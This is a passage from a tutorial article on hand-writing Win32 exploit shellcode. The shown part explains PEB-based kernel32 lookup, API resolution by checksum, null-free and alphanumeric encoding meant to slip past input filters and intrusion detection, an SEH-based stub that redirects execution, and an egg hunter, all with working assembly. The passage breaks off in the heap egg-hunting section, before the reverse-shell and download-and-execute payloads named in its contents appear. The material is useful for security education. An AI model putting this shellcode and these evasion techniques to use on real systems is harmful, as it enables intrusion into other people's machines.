
The Art of Win32 Shellcoding

6 Feb 2012 · CPOL · 28 min read
How to write reliable shellcode on Win32, how to get past the obstacles you will face while writing it, and how to integrate your shellcode into Metasploit

Table of Contents

  1. Introduction
  2. Part 1: The Basics
    1. What’s Shellcode?
    2. The Types of Shellcode
  3. Part 2: Writing Shellcode
    1. Shellcode Skeleton
    2. The Tools
    3. Getting the Delta
    4. Getting the Kernel32 imagebase
    5. Getting the APIs
    6. Null-Free byte Shellcode
    7. Alphanumeric Shellcode
    8. Egg-hunting Shellcode
  4. Part 3: The Payload
    1. Socket Programming
    2. Bind Shell Payload
    3. Reverse Shell Payload
    4. Download & Execute Payload
    5. Put All Together
  5. Part 4: Implement your Shellcode into Metasploit
  6. Conclusion
  7. References
  8. Appendix I – Important Structures

1. Introduction

The secret behind any good exploit is reliable shellcode. The shellcode is the most important element of your exploit. Automated shellcode generators will not help you much in getting past the obstacles that each exploit presents. You should know how to write your own shellcode, and that is what this article will teach you.

In this article, I’m going to teach you how to write reliable shellcode on Win32, how to get past the obstacles that you will face while writing it, and how to integrate your shellcode into Metasploit.

2. Part 1: The Basics

2.1 What’s Shellcode?

Shellcode is simply portable native code: it can run from any location in memory. It is used inside an exploit to connect back to the attacker or to do whatever else the attacker needs.

2.2 The Types of Shellcode

Shellcode is classified by the limitations you face while writing it for a specific vulnerability. There are 3 types:

Null-Byte-Free Shellcode

In this type, you are forced to write shellcode that contains no null bytes. This constraint appears when you exploit a vulnerability in string-handling code: a function that uses strcpy() or sprintf() improperly copies until it finds the null byte (strings are null-terminated) without checking the maximum accepted size of the string, which makes the application vulnerable to a buffer overflow.

In this type of vulnerability, a null byte inside your shellcode is interpreted as the string terminator, so the program copies the shellcode up to the null byte and discards the rest. You therefore have to avoid null bytes anywhere inside your shellcode. The only null byte you can afford is the very last byte.
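To make the truncation concrete, here is a minimal Python sketch that models what a strcpy()-style copy does to a payload. The helper names `strcpy_like` and `has_null` and the two sample byte strings are assumptions made for this illustration; they are not part of any real API.

```python
def strcpy_like(src: bytes) -> bytes:
    """Model a C string copy: keep bytes up to the first 0x00 (hypothetical helper)."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


def has_null(payload: bytes) -> bool:
    """True if the payload contains a byte that would end the copy early."""
    return b"\x00" in payload


# "mov eax,5" (B8 05 00 00 00) followed by "pop ebx" (5B)
with_null = bytes.fromhex("b8050000005b")
# "xor eax,eax" (33 C0), "mov al,5" (B0 05), "pop ebx" (5B)
null_free = bytes.fromhex("33c0b0055b")

print(strcpy_like(with_null).hex())   # only the bytes before the first null survive
print(strcpy_like(null_free).hex())   # the whole payload survives
```

Running a check like `has_null` over the assembled bytes before testing an exploit is a cheap way to catch an instruction that silently introduced a null byte.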

Alphanumeric Shellcode

Strings rarely contain unusual or non-printable characters. When they do, some IDSs (intrusion detection systems) flag them as malicious, especially when they contain suspicious opcode sequences, and so can detect the presence of shellcode. In addition, some applications filter their input and accept only letters and digits (“a-z”, “A-Z” and “0-9”). In this case, you have to write your shellcode using only these characters, that is, only bytes from 0x30 to 0x39, from 0x41 to 0x5A and from 0x61 to 0x7A.
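As a rough sketch of such a filter, the Python below checks every byte of a payload against the three ranges. The function names are hypothetical and the sample inputs are only illustrative.

```python
def is_alnum_byte(b: int) -> bool:
    """True for '0'-'9' (0x30-0x39), 'A'-'Z' (0x41-0x5A) and 'a'-'z' (0x61-0x7A)."""
    return 0x30 <= b <= 0x39 or 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A


def first_bad_offset(payload: bytes) -> int:
    """Return the offset of the first non-alphanumeric byte, or -1 if there is none."""
    for offset, b in enumerate(payload):
        if not is_alnum_byte(b):
            return offset
    return -1


print(first_bad_offset(b"PYhqjj9X"))                      # letters and digits only
print(first_bad_offset(bytes.fromhex("e8000000005b")))    # "call" opcode 0xE8 fails
```

Note that 0x40 (“@”) and 0x60 (“`”) sit just below the letter ranges and are rejected.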

Egg-hunting Shellcode

In some vulnerabilities, you have only a very small buffer to put your shellcode into. In an off-by-one vulnerability, for example, you are restricted to a specific size and cannot send a shellcode bigger than that.

So, you use 2 buffers: one holds your real shellcode, and the second holds a small stub that is used in the attack itself and searches memory for the first buffer.

3. Part 2: Writing Shellcode

3.1 Shellcode Skeleton

Image 1

Any shellcode consists of 4 parts: getting the delta, getting the kernel32 imagebase, getting your APIs, and the payload.

Here we will cover getting the delta, the kernel32 imagebase and the APIs. The payload is covered in the next part of this article.

3.2 The Tools

  • MASM: The Microsoft Macro Assembler. It’s a great and very powerful assembler for Windows.
  • Easy Code Masm: An IDE for MASM. It’s a great visualizer and has the best code completion for assembly.
  • OllyDbg: Your debugger. You can also use it as an assembler.
  • Data Ripper: An OllyDbg plugin that takes the instructions you select and converts them into an array of chars suitable for C. It helps when you need to move your shellcode into an exploit.

3.3 Getting the Delta

The first thing your shellcode should do is find out where it is in memory (the delta). This matters because the shellcode needs to reach its own variables, and it cannot do that without their absolute addresses in memory.

To get the delta (your place in memory), you can use a call-pop sequence to read the Eip. When the call executes, the processor saves the return Eip on the stack, and the following pop moves it from the stack into a register. You then have a pointer into your own shellcode.

ASM
GETDELTA:
call NEXT        ;pushes the address of NEXT (the return Eip) on the stack
NEXT:
pop ebx          ;ebx = address of NEXT in memory

3.4 Getting the Kernel32 imagebase

To refresh your mind, APIs are functions like send(), recv() and connect(). Each group of functions lives in a library, and these libraries are stored in files with the extension .dll. Every library specializes in one kind of function: ws2_32.dll holds the network APIs like send() and recv(), and user32.dll holds the windowing APIs like MessageBoxA() and CreateWindow().

kernel32.dll holds the core Windows APIs. It has LoadLibrary(), which loads any other library, and GetProcAddress(), which returns the address of any API inside a library loaded in memory.

So, to reach any API, you must find the address of kernel32.dll in memory and be able to look up any API inside it.

When an application is loaded into memory, Windows also loads the core libraries like kernel32.dll and ntdll.dll, and records their addresses in a structure called the Process Environment Block (PEB). So, we will retrieve the address of kernel32.dll from the PEB as shown in the next listing:

ASM
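mov eax,dword ptr fs:[30h]     ;eax = PEB
mov eax,dword ptr [eax+0Ch]    ;eax = PEB->LoaderData
mov ebx,dword ptr [eax+1Ch]    ;ebx = InInitializationOrderModuleList (1st entry)
mov ebx,dword ptr [ebx]        ;ebx = ListEntry->FLink (2nd entry)
mov esi,dword ptr [ebx+8h]     ;esi = imagebase of that module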

The first line gets the PEB address through the FS segment register. The second and third lines get PEB->LoaderData->InInitializationOrderModuleList.

The InInitializationOrderModuleList is a doubly linked list that contains all the modules (PE files) loaded in memory (like kernel32.dll, ntdll.dll and the application itself) with the imagebase, entrypoint and filename of each one.

The first entry in InInitializationOrderModuleList is ntdll.dll. To get kernel32.dll, you must go to the next item in the list. So, in the fourth line, we get the next item with ListEntry->FLink. Finally, in the fifth line, we read the imagebase from the information stored about that DLL. Note that this ordering is not guaranteed: on Windows 7 and later, the second entry is typically kernelbase.dll rather than kernel32.dll, so a robust shellcode should check the module name before trusting the result.

3.5 Getting the APIs

To get the APIs, you walk through the PE structure of kernel32.dll. I won’t say much about the PE structure in general; I’ll cover only the Export Table in the Data Directory.

The Export Table contains 3 arrays. The first array is AddressOfNames and it contains the names of all the functions exported by the DLL. The second array is AddressOfFunctions and it contains the addresses of all these functions.

Image 2

The problem with these two arrays is that they are not ordered the same way. For example, GetProcAddress may be No.3 in AddressOfNames but No.5 in AddressOfFunctions.

To solve this problem, the Export Table has a third array named AddressOfNameOrdinals. This array is ordered the same way as AddressOfNames, and each entry holds the index of the corresponding function in AddressOfFunctions.

So, to find an API, you search for its name in AddressOfNames, take its index there, read the entry at that index in AddressOfNameOrdinals to get the API’s index in AddressOfFunctions, and finally read its address from AddressOfFunctions. Don’t forget that all the addresses in these arrays are RVAs: they are relative to the beginning of the PE file in memory. So, you should add the kernel32 imagebase to every address you work with.
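The three-array lookup can be sketched in a few lines of Python. This is only a toy model: the `ExportTable` class, the table contents, the RVAs and the imagebase value are all made up for illustration, and the names are stored as plain strings instead of RVAs to strings.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ExportTable:
    """Toy model of the three export arrays (all values are illustrative)."""
    names: List[str]          # AddressOfNames (already resolved to strings)
    name_ordinals: List[int]  # AddressOfNameOrdinals, parallel to names
    functions: List[int]      # AddressOfFunctions, holds RVAs


def resolve(table: ExportTable, image_base: int, api: str) -> Optional[int]:
    """Name -> index in names -> index in functions -> RVA -> virtual address."""
    if api not in table.names:
        return None
    name_index = table.names.index(api)
    function_index = table.name_ordinals[name_index]
    rva = table.functions[function_index]
    return image_base + rva


# Made-up table: GetProcAddress is entry 3 of names but entry 5 of functions.
table = ExportTable(
    names=["Beep", "CloseHandle", "ExitProcess", "GetProcAddress"],
    name_ordinals=[0, 2, 1, 5],
    functions=[0x1000, 0x1200, 0x1100, 0x1300, 0x1400, 0x1500],
)
BASE = 0x7C800000  # hypothetical kernel32 imagebase

print(hex(resolve(table, BASE, "GetProcAddress")))
```

The important detail is that the index found in `names` is never used directly on `functions`; it always goes through `name_ordinals` first.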

In the next code listing, we get the addresses of our APIs by calculating a checksum over the characters of every API name in kernel32 and comparing it with the checksums of the APIs we need.

ASM
;Inputs:
;-------
;Esi --> Kernelbase
;Ebx -->The Array Of API Addresses that we will save in

GetAPIs Proc

 Local AddressFunctions:DWord
 Local AddressOfNameOrdinals:DWord
 Local AddressNames:DWord
 Local NumberOfNames:DWord

 Getting_PE_Header:
Mov Edi, Esi         ;Kernel32 imagebase
Mov Eax, [Esi].IMAGE_DOS_HEADER.e_lfanew
Add Esi, Eax         ;Esi-->PE Header Edi-->MZ Header
Getting_Export_Table:
Mov Eax, [Esi].IMAGE_NT_HEADERS.OptionalHeader.DataDirectory[0].VirtualAddress
Add Eax, Edi
Mov Esi, Eax
Getting_Arrays:
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
Add Eax, Edi
Mov AddressFunctions, Eax ;the first array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
Add Eax, Edi
Mov AddressOfNameOrdinals, Eax ;the second array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.AddressOfNames
Add Eax, Edi
Mov AddressNames, Eax     ;the third array
Mov Eax, [Esi].IMAGE_EXPORT_DIRECTORY.NumberOfNames
Mov NumberOfNames, Eax     ;the number of APIs
Push Esi
Mov Esi, AddressNames
Xor Ecx, Ecx
GetTheAPIs:
Lodsd
Push Esi
Lea Esi, [Eax + Edi]     ;RVA + imagebase = VA
Xor Edx,Edx
Xor Eax,Eax
Checksum_Calc:
Lodsb
Test Eax, Eax        ;Avoid the null byte in Cmp Eax,0
Jz CheckFunction
Add Edx,Eax
Xor Edx,Eax
Inc Edx
Jmp Checksum_Calc
CheckFunction:
Pop Esi                  ;Esi --> next entry in AddressOfNames
Xor Eax, Eax             ;Eax = index of this API in our output array
Cmp Edx, 0AAAAAAAAH      ;FirstAPI
Jz FoundAddress
Inc Eax                  ;Inc changes ZF, so it must come before the Cmp
Cmp Edx, 0BBBBBBBBh      ;SecondAPI
Jz FoundAddress
Inc Eax
Cmp Edx, 0CCCCCCCCh      ;ThirdAPI
Jz FoundAddress
NextName:
Inc Ecx                  ;Ecx = index of the next name
Cmp Ecx, NumberOfNames
Jz EndFunc
Jmp GetTheAPIs
FoundAddress:
Push Ecx                 ;save the name index (the loop counter)
Mov Edx, AddressOfNameOrdinals
Movzx Ecx, Word Ptr [Edx + Ecx * 2]  ;name index --> index in AddressOfFunctions
Mov Edx, AddressFunctions
Mov Edx, DWord Ptr [Edx + Ecx * 4]   ;RVA of the API
Add Edx, Edi             ;RVA + imagebase = VA
Mov [Ebx + Eax * 4], Edx ;save it in our array of API addresses
Pop Ecx                  ;restore the loop counter
Jmp NextName
EndFunc:
Mov Esi, Edi
Ret
GetAPIs EndP

In this code, we get the PE Header and then the Export Table from the Data Directory. After that, we get the 3 arrays plus the number of entries in them.

Once we have all the information we need, we loop over the entries of the AddressOfNames array. We load every entry with “Lodsd”, which loads 4 bytes from memory at “Esi”. We then calculate the checksum of the API name and compare it with the checksums of the APIs we need.

After we find an API, we get its address using the remaining two arrays. Finally, we save it in an array so we can call it when needed.
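To produce the constants that replace the placeholders 0AAAAAAAAh, 0BBBBBBBBh and 0CCCCCCCCh, the checksum has to be computed offline with exactly the same steps as the Checksum_Calc loop. The Python below is a sketch of that loop; the function names and the list of API names are assumptions for this example.

```python
def api_checksum(name: bytes) -> int:
    """Mirror of the Checksum_Calc loop: Add, Xor, then Inc on a 32-bit Edx."""
    edx = 0
    for ch in name:                      # the asm loop stops at the terminating null
        edx = (edx + ch) & 0xFFFFFFFF    # Add Edx, Eax
        edx ^= ch                        # Xor Edx, Eax
        edx = (edx + 1) & 0xFFFFFFFF     # Inc Edx
    return edx


def find_collisions(names):
    """Group names by checksum and return only the groups with more than one name."""
    groups = {}
    for n in names:
        groups.setdefault(api_checksum(n), []).append(n)
    return {c: g for c, g in groups.items() if len(g) > 1}


for api in (b"LoadLibraryA", b"GetProcAddress", b"CreateProcessA"):
    print(api.decode(), hex(api_checksum(api)))
```

Because the function is so simple, different names can share a checksum (any one-character name yields 1, for instance). It is worth running something like `find_collisions` over the real export names of the target DLL before relying on the values.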

3.6 Null-Free byte Shellcode

Writing clean shellcode (or null-free shellcode) is not hard once you know which instructions produce null bytes and how to avoid them. The most common ones are “mov eax,XX”, “cmp eax,0” and “call Next”, as you saw in getting the delta.

The table below lists these common instructions with their byte encodings and their null-free replacements.

Null-Byte Instruction   Binary Form    Null-Free Instruction   Binary Form
mov eax,5               B8 05000000    mov al,5                B0 05
call next               E8 00000000    jmp next/call prev      EB 05 / E8 F9FFFFFF
cmp eax,0               83F8 00        test eax,eax            85C0
mov eax,0               B8 00000000    xor eax,eax             33C0

To understand this table, note that the mov and call instructions take an immediate (or an offset) that is 32 bits wide. In most cases, these 32 bits contain null bytes. To avoid that, we use another instruction that takes only one byte (8 bits), like jmp or mov al,XX (as al is 8 bits wide). Keep in mind that mov al,XX leaves the upper 24 bits of eax untouched, so clear eax first (xor eax,eax) if you need the whole register.

In a “call” instruction, the 4 bytes after the opcode are the offset from the end of the call instruction (its address + 5) to the place the call will reach. If you “call” a previous location, the offset is negative and looks like “0xFFFFFFXX”, so there is no null byte inside.
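The offset arithmetic is easy to check by hand. The following Python sketch encodes a near call and a short jmp from the address of the instruction and the address of its target; the helper names and the offsets used in the example are assumptions for illustration.

```python
import struct


def encode_call(call_addr: int, target: int) -> bytes:
    """E8 rel32, where rel32 = target - (address of the call + 5)."""
    rel32 = (target - (call_addr + 5)) & 0xFFFFFFFF
    return b"\xE8" + struct.pack("<I", rel32)


def encode_jmp_short(jmp_addr: int, target: int) -> bytes:
    """EB rel8, where rel8 = target - (address of the jmp + 2)."""
    rel8 = target - (jmp_addr + 2)
    if not -128 <= rel8 <= 127:
        raise ValueError("target out of range for a short jmp")
    return b"\xEB" + struct.pack("<b", rel8)


forward = encode_call(0, 5)     # "call NEXT" where NEXT is the very next instruction
backward = encode_call(5, 2)    # a call placed at offset 5 that targets offset 2

print(forward.hex(), b"\x00" in forward)
print(backward.hex(), b"\x00" in backward)
```

A forward call to a nearby label always has small positive offsets (and so null bytes), while a backward call has its upper bytes filled with 0xFF.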

In the listing on how to get the delta, we didn’t avoid the null bytes. To avoid them, we apply the trick from the table above and use jmp/call instead of call next, as shown in the listing below:

ASM
GETDELTA:
jmp NEXT
PREV:
pop ebx
jmp END_GETDELTA
NEXT:
call PREV
END_GETDELTA:

The binary form of this shellcode becomes “0xEB, 0x03, 0x5B, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF” instead of “0xE8, 0x00, 0x00, 0x00, 0x00, 0x5B”. As you see, there’s no null byte.

3.7 Alphanumeric Shellcode

Alphanumeric shellcode is perhaps the hardest type to write. Writing alphanumeric shellcode that can get the delta or get the APIs is nearly impossible.

So, for this type of shellcode, we use an encoder. The decoder stub is simply a small shellcode whose only job is to decode another shellcode and execute it. In alphanumeric code, you can’t get the delta with call-pop (as “call XX” assembles to “E8 XXXXXXXX”): neither “0xE8” nor “0xFF” is among your available bytes.

On top of that, you don’t have “mov”, “add”, “sub” or any arithmetic instruction except “xor” and “imul”. You do have the “push”, “pop”, “pushad” and “popad” instructions.

There are also restrictions on the destination and the source of an instruction: for example, “xor eax,ecx” is not allowed and “xor dword ptr [eax],ecx” is not allowed.

To understand this properly, you need to know more about how your assembler (masm or nasm) encodes your instructions.

I won’t go into details, but you can check the “Intel® 64 and IA-32 Architectures Software Developer’s Manual, Volume 2A” for more information on this topic. In brief, this is the layout of an instruction once it is assembled into binary form:

Image 3

The ModRM byte describes the destination and the source of your instruction. The assembler builds it from a table, and every combination of source and destination has a different encoding in binary form.

In alphanumeric shellcode, the allowed ModRM values restrict you to specific forms of your instructions, as you see in the table:

Allowed Shapes
xor dword ptr [exx + disp8],exx
xor exx,dword ptr [exx + disp8]
xor dword ptr [exx],esi/edi
xor dword ptr [disp32],esi/edi
xor dword ptr FS:[...],exx (FS allowed)
xor dword ptr [exx+esi],esi/edi (exx except edi)

ModRM has an extension named SIB. SIB is also a single byte, like ModRM, and it encodes the third item of the operand, or the second item when there is no displacement, as in “[eax+esi*4+XXXX]” or the last entry in the previous table, “[exx+esi]”. Like every other byte, the SIB value must stay within the limits “30-39, 41-5A, 61-7A”.

In shellcode, I don’t think you will use anything other than what’s in the previous table, and you can read more about these encodings in the “Intel® 64 and IA-32 Architectures Software Developer’s Manual, Volume 2A”.
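To see why some operand combinations are allowed and others are not, the ModRM byte can be computed by hand. The Python below is a simplified sketch: it packs the three ModRM fields for the opcode 0x31 (xor r/m32, r32) and tests whether the result is alphanumeric. It ignores the special cases where r/m selects a SIB byte or a bare disp32, and the helper names are assumptions.

```python
REG = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "esp": 4, "ebp": 5, "esi": 6, "edi": 7}


def modrm(mod: int, reg: str, rm: str) -> int:
    """Pack the three ModRM fields: mod (2 bits), reg (3 bits), r/m (3 bits)."""
    return (mod << 6) | (REG[reg] << 3) | REG[rm]


def is_alnum(b: int) -> bool:
    """True if the byte is an ASCII digit or letter."""
    return 0x30 <= b <= 0x39 or 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A


# For opcode 0x31 the destination is r/m and the source is reg.
# mod=0 means "[rm]" with no displacement, mod=3 means register to register.
candidates = {
    "xor eax,ecx": modrm(3, "ecx", "eax"),
    "xor dword ptr [eax],ecx": modrm(0, "ecx", "eax"),
    "xor dword ptr [eax],esi": modrm(0, "esi", "eax"),
    "xor dword ptr [eax],edi": modrm(0, "edi", "eax"),
}

for text, byte in candidates.items():
    print(f"{text:26} 31 {byte:02X}  alphanumeric: {is_alnum(byte)}")
```

Only esi and edi in the reg field push the ModRM byte of “[exx]” operands into the digit range, which matches the “esi/edi” entries of the table.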

So, to write your encoder/decoder, you have only “imul” and “xor” as arithmetic operations, and only the stack to store your decoded data. You can encode each 4 bytes of your original shellcode as two 4-byte numbers (integers) that are themselves acceptable (within the limits) and whose product is the number you need, like this:

ASM
push 35356746
push esp
pop ecx
imul edi,dword ptr [ecx],45653456
pop edx
push edi

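This code multiplies 0x35356746 by 0x45653456 and generates 0x5588E984 (only the low 32 bits of the product are kept). In memory, these are the bytes 84 E9 88 55, which decode as “test cl,ch” followed by the first two bytes of “mov byte ptr [ebp],dl”. That’s just an example of how to create an encoder and decoder.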
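The multiplication is easy to verify outside a debugger. This short Python sketch reproduces what the three-operand imul leaves in edi and checks that both factors consist only of alphanumeric bytes; the helper names are assumptions made for this example.

```python
import struct

MASK32 = 0xFFFFFFFF


def imul32(a: int, b: int) -> int:
    """Low 32 bits of a * b, which is what the three-operand imul keeps."""
    return (a * b) & MASK32


def is_alnum_dword(value: int) -> bool:
    """True if all 4 little-endian bytes of value are ASCII letters or digits."""
    return struct.pack("<I", value).isalnum()


a, b = 0x35356746, 0x45653456
product = imul32(a, b)

print(hex(product))
print(struct.pack("<I", product).hex(" "))   # byte order as it lands in memory
print(is_alnum_dword(a), is_alnum_dword(b))
```

The two factors pass the alphanumeric check while their product does not, which is the whole point of the encoding.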

It’s hard to find two numbers whose product gives exactly the 4 bytes you need, and the search may run in a very long loop. So you can work with 2 bytes at a time, like this:

ASM
push 3030786F
pop eax
push ax
push esp
pop ecx
imul di,word ptr [ecx],3445
push di

This code multiplies 0x786F (you can ignore the 0x3030) by 0x3445 to generate 0x01EB, which is equivalent to “jmp next”. To find such pairs, I wrote a small C++ program that searches for them:

C++
#include <cstdint>
#include <iostream>
using namespace std;

// True if b is an ASCII digit or letter (0x30-0x39, 0x41-0x5A, 0x61-0x7A)
static bool IsAlnum(uint32_t b) {
    return (b >= 0x30 && b <= 0x39) || (b >= 0x41 && b <= 0x5A) || (b >= 0x61 && b <= 0x7A);
}

int main() {
    const uint32_t YourNumber = 0x000001EB;   // the 2 bytes you need ("EB 01" in memory)
    for (uint32_t i = 0x3030; i <= 0x7A7A; i++) {
        if (!IsAlnum(i & 0xFF) || !IsAlnum(i >> 8)) continue;       // both bytes of i
        for (uint32_t l = 0x3030; l <= 0x7A7A; l++) {
            if (!IsAlnum(l & 0xFF) || !IsAlnum(l >> 8)) continue;   // both bytes of l
            if (((i * l) & 0xFFFF) == YourNumber)                   // low 16 bits, like imul di
                cout << hex << i << " " << l << " " << ((i * l) & 0xFFFF) << "\n";
        }
    }
    return 0;
}

In all of these encoders, the shellcode is decoded onto the stack using the “push” instruction. Beware of the stack direction: esp decreases with every push, so you must push the last part of the shellcode first. Otherwise, the data ends up in the wrong order.

Also notice that your (Intel) processor uses little endian to represent numbers. So, for an instruction like “jmp +1”, whose bytes are “EB 01”, you need to generate and push the number 0x01EB, not 0xEB01.
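Both points (push order and byte order) can be checked with a small model of the stack. In the Python sketch below, `push_plan` and `simulate_pushes` are hypothetical helpers, the sample bytes are arbitrary, and padding with 0x90 (NOP) is an assumption of this example.

```python
import struct


def push_plan(shellcode: bytes):
    """Split shellcode into the dword values to push, in push order (last chunk first)."""
    padded = shellcode + b"\x90" * (-len(shellcode) % 4)   # pad with NOPs (an assumption)
    chunks = [padded[i:i + 4] for i in range(0, len(padded), 4)]
    return [struct.unpack("<I", c)[0] for c in reversed(chunks)]


def simulate_pushes(values) -> bytes:
    """Model the stack: each push stores 4 little-endian bytes below the previous ones."""
    stack = b""
    for v in values:
        stack = struct.pack("<I", v) + stack   # esp moves down, so new data goes in front
    return stack


code = bytes.fromhex("eb015b33c0b005c3")   # 8 arbitrary sample bytes
plan = push_plan(code)

print([hex(v) for v in plan])
print(simulate_pushes(plan) == code)
```

The first value in the plan holds the last 4 bytes of the code, and each value reads “backwards” compared with the bytes it produces in memory.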

After all of this, you need to pass execution to the stack to start running your original shellcode. To do that, you have to find a way to set Eip to Esp.

As you don’t have “call” or “jmp exx”, the only way left to pass execution is SEH. SEH is Structured Exception Handling, the mechanism Windows uses to handle exceptions. It’s a singly linked list whose most recent entry is stored at FS:[0], that is, at the beginning of the Thread Information Block (TIB). FS points to the TIB, which is the first part of the Thread Environment Block (TEB), and the TEB holds the pointer to the Process Environment Block (PEB) at FS:[30h], which we used to get the kernel32 address.

Don’t worry about all of this; you only need to know that the list head is stored at FS:[0], and that it’s a singly linked list with this structure:

C++
struct SEH_RECORD
{
      SEH_RECORD *sehRecord;
      DWORD SEHandler;
};

The sehRecord field points to the next entry in the list and SEHandler points to the code that will handle the error.

When an error occurs, Windows passes execution to the code at SEHandler to handle the error and then returns. So, we can store esp in SEHandler and raise an error (by reading from an invalid pointer, for example) to make Windows pass execution to our shellcode. This way, our decoded shellcode runs.

FS:[0] holds the pointer to the last entry in the linked list (the last created and the first to be used). So we create a new entry with our esp as SEHandler and with the pointer taken from FS:[0] as sehRecord, and save the pointer to this entry at FS:[0]. Here is the code in alphanumeric form:

ASM
push 396A6A71
pop eax
xor eax,396A6A71
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad
xor edi,dword ptr fs:[eax]
push esp
push edi
push esp
xor esi,dword ptr [esp+esi]
pop ecx
xor dword ptr fs:[eax],edi
xor dword ptr fs:[eax],esi

The first lines set eax to zero (a number xored with itself gives zero). Then we use 8 pushes and a popad to set the other registers to zero (popad doesn’t modify esp). After that, we read the value at FS:[0] using xor (number xor 0 = the same number).

Then we begin to create the SEH entry by pushing esp (as it now points to our code) and pushing edi (the next sehRecord).

With “push esp” and “xor esi,dword ptr [esp+esi]”, we make esi equal to esp, because “pop esi” assembles to 0x5E (“^”), which is outside the limits. Then we set FS:[0] to zero by xoring it with its own value, and finally we set it to esi, which points to our new entry.

The code is small, only 36 bytes. If you look at it in ASCII view, you will see “hqjj9X5qjj9PPPPPPPPad38TWT344Yd18d10”: nothing but normal characters.
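As a sanity check, the listing can be assembled by hand and tested against the alphanumeric rule. The Python below is a sketch: the opcode bytes were written out manually for each instruction of the listing, and the variable names are assumptions.

```python
# Opcode bytes for each instruction of the listing, in order (hand-assembled).
STUB = [
    ("push 396A6A71",               "68 71 6A 6A 39"),
    ("pop eax",                     "58"),
    ("xor eax,396A6A71",            "35 71 6A 6A 39"),
    ("push eax (8 times)",          "50" * 8),
    ("popad",                       "61"),
    ("xor edi,dword ptr fs:[eax]",  "64 33 38"),
    ("push esp",                    "54"),
    ("push edi",                    "57"),
    ("push esp",                    "54"),
    ("xor esi,dword ptr [esp+esi]", "33 34 34"),
    ("pop ecx",                     "59"),
    ("xor dword ptr fs:[eax],edi",  "64 31 38"),
    ("xor dword ptr fs:[eax],esi",  "64 31 30"),
]

stub_bytes = b"".join(bytes.fromhex(hexbytes) for _, hexbytes in STUB)

print(stub_bytes.decode("ascii"))
print(len(stub_bytes), stub_bytes.isalnum())
```

The FS segment prefix is 0x64 (“d”), which is why every access to fs:[eax] starts with that letter.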

Now, I think (and I hope) that you can write a fully functional alphanumeric shellcode for Windows. Next, we move on to egg-hunting shellcode.

3.8 Egg-hunting Shellcode

Egg-hunting shellcode (as described in Part 1) is an egg searcher, or shellcode searcher. To be found, the main shellcode must start with a mark (a 4-byte number) that you search for, like 0xBBBBBBBB or anything you choose.

Second, you should know where your bigger shellcode will be: on the stack or in the heap? In other words, is it a local variable like “char buff[200]”, or is it allocated dynamically like “char* buff = malloc(200)”?

If it is on the stack, you can easily search for it. In the TIB (Thread Information Block) that we described earlier, the 2nd and the 3rd items (FS:[4] and FS:[8]) hold the two ends of the stack: its base (the highest address) and its limit (the lowest address). So, you can search for your mark between these pointers. Let’s examine the code:

ASM
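; eax is assumed to be 4 on entry, so the first read is FS:[4]
mov ecx,dword ptr fs:[eax] ; FS:[4] = the end of the stack (highest address)
add eax,4
mov edi,dword ptr fs:[eax] ; FS:[8] = the beginning of the stack (lowest address)
sub ecx,edi ; Getting the size
mov eax,BBBBBBBC ; not BBBBBBBB, so the hunter does not find itself by mistake
dec eax ; became == 0xBBBBBBBB
NOT_YET:
repne scasb ; search for the byte 0xBB (al)
cmp dword ptr [edi-1],eax ; edi is one past the match: check the whole dword
jnz NOT_YET
add edi,3 ; skip the rest of the mark
call edi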

As you see, it’s very simple and less than 30 bytes. It searches for a single byte of the mark and, when it finds one, compares the whole dword with 0xBBBBBBBB. On a match, it calls the new shellcode.
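The search strategy itself (scan for one byte, then confirm the whole dword) can be modeled on an ordinary byte buffer. The Python below is only a simulation of the idea, not of the real stack; the `hunt` function and the contents of the fake memory are assumptions.

```python
import struct

MARK = 0xBBBBBBBB


def hunt(memory: bytes, mark: int = MARK) -> int:
    """Return the offset of the first byte after the mark, or -1 if it is absent.

    Like the listing, it scans for one byte of the mark first and only then
    compares the whole dword.
    """
    first = bytes([mark & 0xFF])
    packed = struct.pack("<I", mark)
    pos = memory.find(first)                     # repne scasb
    while pos != -1:
        if memory[pos:pos + 4] == packed:        # cmp dword ptr [edi-1],eax
            return pos + 4                       # add edi,3 (edi is already pos + 1)
        pos = memory.find(first, pos + 1)
    return -1


# Fake memory: filler, a lone 0xBB decoy, more filler, then the mark and the payload.
memory = b"\x41" * 16 + b"\xBB\x42" + b"\x43" * 6 + struct.pack("<I", MARK) + b"PAYLOAD"
offset = hunt(memory)

print(offset, memory[offset:])
```

The decoy byte shows why the dword comparison is needed: a single 0xBB can appear anywhere in memory.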

On the stack, it’s simple. For the heap, it’s a bit more complicated.

To understand how we search the heap, you first need to understand what the heap is and how it is structured. I will describe it briefly, just enough for this topic, and you can read more about it on the internet.

When you allocate a piece of memory (20 bytes, for example) directly from the virtual memory manager (the main Windows memory manager), it allocates at least one memory page (4096 bytes) for you, as that is its minimum size, even if you need only 20 bytes. The heap exists mainly to avoid this waste of memory by handing out smaller blocks of memory for you to use.

To do that, the heap manager allocates a large chunk of memory from the virtual memory manager (with the VirtualAlloc API or similar functions) and then allocates small blocks inside it. If this large chunk is exhausted, including both its committed pages and its reserved pages, the heap manager allocates another large chunk of memory. These chunks are named segments. Remember them, as we will use them to get the size of the process heap.

In practice, when an application calls malloc or HeapAlloc, the heap manager allocates a block of memory (of the size the application needs) in a segment of one of the process heaps (there can be more than one). You can find these heaps through the Process Environment Block (PEB) at offset 0x90, as you see in this snippet of the PEB that contains the information we need.

    +0x088 NumberOfHeaps
    +0x08c MaximumNumberOfHeaps
    +0x090 *ProcessHeaps

As you see, you can get the PEB from FS:[30h], then get the array of process heaps from PEB+0x90 and the number of entries in this array (the number of heaps) from PEB+0x88, and loop over them to search for your mark inside.

But you will ask: where can I get the size of these heaps in memory? The best way is to find the last entry (allocated block) in the segment, or the address just after it.

To get that, you read the segments of every heap (in the ProcessHeaps array). The segments are stored in an array of 64 entries whose first item is at HeapAddress+0x58, and you will usually see only one segment inside the heap.

